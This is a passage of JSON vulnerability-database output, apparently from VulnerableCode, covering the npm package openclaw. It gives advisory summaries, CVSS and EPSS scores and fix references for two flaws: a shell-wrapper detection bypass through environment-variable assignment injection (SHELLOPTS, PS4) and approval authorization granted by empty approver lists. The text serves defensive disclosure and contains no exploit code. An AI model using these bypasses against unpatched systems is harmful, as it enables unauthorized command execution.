fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-
5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-
7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-
6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-
a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32302","GHSA-5wcw-8jjv-m286"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2jsx-pvnr-6ydn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89219?format=json","vulnerability_id":"VCID-2khh-wv8p-97ff","summary":"OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms\n## Summary\n\nShell-wrapper detection missed env-argv assignment injection forms.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.22 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nExec preflight handling missed shell-wrapper and argv-level 
environment assignment forms that could affect execution semantics, including high-risk shell environment controls.\n\n## Technical Details\n\nThe fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy.\n\n## Fix\n\nThe issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab`\n- PR: #65717\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42435","reference_id":"","reference_type":"","scores":[{"value":"0.00108","scoring_system":"epss","scoring_elements":"0.28675","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31188","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42435"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:
4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65717","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65717"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42435","reference_id":"CVE-2026-42435","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42435"},{"reference_url":"https://github.com/advisories/GHSA-j6c7-3h5x-99g9","reference_id":"G
HSA-j6c7-3h5x-99g9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j6c7-3h5x-99g9"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection","reference_id":"openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a9
8b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-42435","GHSA-j6c7-3h5x-99g9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2khh-wv8p-97ff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89236?format=json","vulnerability_id":"VCID-2mxq-krq5-bycx","summary":"OpenClaw: Empty approver lists could grant explicit approval authorization\n## Summary\n\nEmpty approver lists could grant explicit approval authorization.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nFor helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id.\n\n## Technical Details\n\nThe fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders.\n\n## Fix\n\nThe issue was fixed in #65714. 
The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `0a105c0900de701d2ee9f1abc96b017afbd0afdd`\n- PR: #65714\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43574","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09702","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11327","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11359","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43574"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Trac
k","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd"},{"reference_url":"https://github.com/openclaw/openclaw/pull/65714","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/65714"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43574","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://
nvd.nist.gov/vuln/detail/CVE-2026-43574"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists"},{"reference_url":"https://github.com/advisories/GHSA-49cg-279w-m73x","reference_id":"GHSA-49cg-279w-m73x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-49cg-279w-m73x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110264?format=json","purl":"pkg:npm/openclaw@2026.4.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"
